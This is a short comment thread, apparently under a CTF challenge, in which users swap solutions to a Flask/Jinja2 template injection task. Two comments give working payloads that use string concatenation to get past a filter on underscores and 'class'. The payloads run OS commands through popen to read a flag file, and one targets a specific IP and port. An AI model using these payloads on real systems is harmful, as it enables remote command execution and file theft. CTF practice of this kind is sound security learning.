WCRH @ 2024-05-28 23:23:11 👍0
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL @ 2024-05-07 23:23:11 👍0
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 @ 2024-02-07 23:23:11 👍1
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 @ 2023-11-07 23:23:11 👍0
爆出传参search,利用字符串拼接绕过
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html